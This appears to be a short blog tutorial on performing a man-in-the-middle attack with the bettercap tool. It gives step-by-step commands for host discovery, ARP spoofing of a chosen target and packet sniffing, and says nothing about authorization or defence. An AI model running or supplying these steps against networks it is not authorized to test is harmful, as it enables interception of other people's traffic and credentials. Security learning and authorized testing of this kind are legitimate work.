Man-in-the-Middle Attacks Made Easy with BetterCAP

A Man-in-the-Middle (MITM) attack is a type of cyber attack where an attacker secretly intercepts communication between two parties who believe they are directly communicating with each other. In other words, the attacker stands in the middle of the communication channel between two users or devices, without them knowing.

Installing bettercap:

<apt-get install bettercap>

I have already installed it.

To run it type bettercap and then type help

Performing MITM: To perform mitm we will use following modules-

1. net.probe: this will send different types of probe packet to IP’s present in the subnet for net.recon module to detect them
2. net.recon: periodically detects arp table to detect new hosts in the network.
3. Arp.spoof: spoofs selected host to perform MITM
4. Net.sniff: This module is network packet sniffer and fuzzer

You can type help following with the module name to grab some details about:

Lets start our MITM :-
1. Start the prober module to send probe packet to devices in the network .(Note-probe module can automatically turn on net.recon module)
<net.probe on>

2. Start host discovery

<net.recon on>

3. Set the arp.spoof module option fullduplex to true

< set arp.spoof.fullduplex true >

4. Specify the target to spoof

[set arp.spoof.targets <ip> ]

5. Start ARP spoofer:

<arp.spoof on>

6. Start the packet sniffer:

<net.sniff on>

7. Type help to see the modules running

Now see arp table in any machine connected to that network, in my case I checked in my windows machine by using command <arp -a>. and notice that arp of attacker machine and router is same because Windows machine ‘thinks’ the router MAC address is the same as the Kali since the ARP table is spoofed.

Leave a Comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Open chat
Need help?
Hello 👋
Can we help you?